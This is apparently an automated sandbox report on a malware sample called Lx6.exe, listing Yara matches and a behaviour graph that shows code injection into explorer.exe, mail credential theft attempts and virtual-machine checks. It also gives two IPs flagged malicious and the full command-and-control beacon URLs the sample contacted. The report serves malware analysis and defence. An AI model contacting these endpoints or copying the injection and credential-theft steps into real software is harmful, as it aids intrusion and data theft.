Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 720586 Sample: Lx6.exe Startdate: 11/10/2022 Architecture: WINDOWS Score: 100 119 Snort IDS alert for network traffic 2->119 121 Malicious sample detected (through community Yara rule) 2->121 123 Antivirus / Scanner detection for submitted sample 2->123 125 4 other signatures 2->125 11 mshta.exe 19 2->11         started        13 Lx6.exe 1 12 2->13         started        process3 dnsIp4 17 powershell.exe 28 11->17         started        99 194.76.225.60, 49700, 80 RACKPLACEDE Germany 13->99 101 www.msn.com 13->101 103 3 other IPs or domains 13->103 169 Writes to foreign memory regions 13->169 171 Writes or reads registry keys via WMI 13->171 173 Writes registry values via WMI 13->173 21 control.exe 1 13->21         started        signatures5 process6 file7 83 C:\Users\user\AppData\...\iyr5jfx4.cmdline, Unicode 17->83 dropped 127 Injects code into the Windows Explorer (explorer.exe) 17->127 129 Writes to foreign memory regions 17->129 131 Modifies the context of a thread in another process (thread injection) 17->131 133 2 other signatures 17->133 23 explorer.exe 5 20 17->23 injected 27 conhost.exe 17->27         started        29 csc.exe 3 17->29         started        32 csc.exe 3 17->32         started        34 rundll32.exe 21->34         started        signatures8 process9 dnsIp10 93 194.76.225.61, 49703, 80 RACKPLACEDE Germany 23->93 95 a-0003.a-msedge.net 204.79.197.203, 49702, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->95 97 5 other IPs or domains 23->97 159 System process connects to network (likely due to code injection or exploit) 23->159 161 Tries to steal Mail credentials (via file / registry access) 23->161 163 Changes memory attributes in foreign processes to executable or writable 23->163 167 8 other signatures 23->167 36 cmd.exe 23->36         started        39 cmd.exe 23->39         started        41 cmd.exe 23->41         started        47 26 other processes 23->47 165 Writes registry values via WMI 27->165 89 C:\Users\user\AppData\Local\...\iyr5jfx4.dll, PE32 29->89 dropped 43 cvtres.exe 1 29->43         started        91 C:\Users\user\AppData\Local\...\jxpjpfgv.dll, PE32 32->91 dropped 45 cvtres.exe 1 32->45         started        file11 signatures12 process13 signatures14 135 Writes to foreign memory regions 36->135 137 Modifies the context of a thread in another process (thread injection) 36->137 139 Maps a DLL or memory area into another process 36->139 49 powershell.exe 36->49         started        52 conhost.exe 36->52         started        141 Uses ping.exe to sleep 39->141 143 Uses ping.exe to check the status of other devices and networks 39->143 145 Uses nslookup.exe to query domains 39->145 147 Uses net.exe to modify the status of services 39->147 54 conhost.exe 39->54         started        56 PING.EXE 39->56         started        58 systeminfo.exe 41->58         started        60 conhost.exe 41->60         started        149 Performs a network lookup / discovery via net view 47->149 62 nslookup.exe 47->62         started        65 net.exe 47->65         started        67 31 other processes 47->67 process15 dnsIp16 109 Writes to foreign memory regions 49->109 111 Modifies the context of a thread in another process (thread injection) 49->111 113 Maps a DLL or memory area into another process 49->113 69 csc.exe 49->69         started        73 csc.exe 49->73         started        75 conhost.exe 49->75         started        115 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 58->115 117 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 58->117 105 8.8.8.8.in-addr.arpa 62->105 107 1.0.0.127.in-addr.arpa 62->107 77 net1.exe 65->77         started        signatures17 process18 file19 85 C:\Users\user\AppData\Local\...\msihj3zd.dll, PE32 69->85 dropped 151 Writes to foreign memory regions 69->151 153 Allocates memory in foreign processes 69->153 155 Modifies the context of a thread in another process (thread injection) 69->155 79 cvtres.exe 69->79         started        87 C:\Users\user\AppData\Local\...\vupj0yhs.dll, PE32 73->87 dropped 157 Maps a DLL or memory area into another process 73->157 81 cvtres.exe 73->81         started        signatures20 process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.76.225.60
 unknown Germany
58329 RACKPLACEDE true
194.76.225.61
 unknown Germany
58329 RACKPLACEDE true
204.79.197.203
 a-0003.a-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
a-0003.a-msedge.net 204.79.197.203 true
apnfy.msn.com unknown unknown
tel12.msn.com unknown unknown
www.msn.com unknown unknown
1.0.0.127.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://194.76.225.61/doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif true
  • Avira URL Cloud: safe
 unknown
http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr true
  • Avira URL Cloud: safe
 unknown
http://194.76.225.61/doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr true
  • Avira URL Cloud: safe
 unknown
http://194.76.225.60/doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr true
  • Avira URL Cloud: safe
 unknown
http://www.msn.com/ false
    		high
    http://194.76.225.61/doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr true
    • Avira URL Cloud: safe
    		 unknown
    http://www.msn.com/de-ch/ false
      		high
      http://194.76.225.61/doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif true
      • Avira URL Cloud: safe
      		 unknown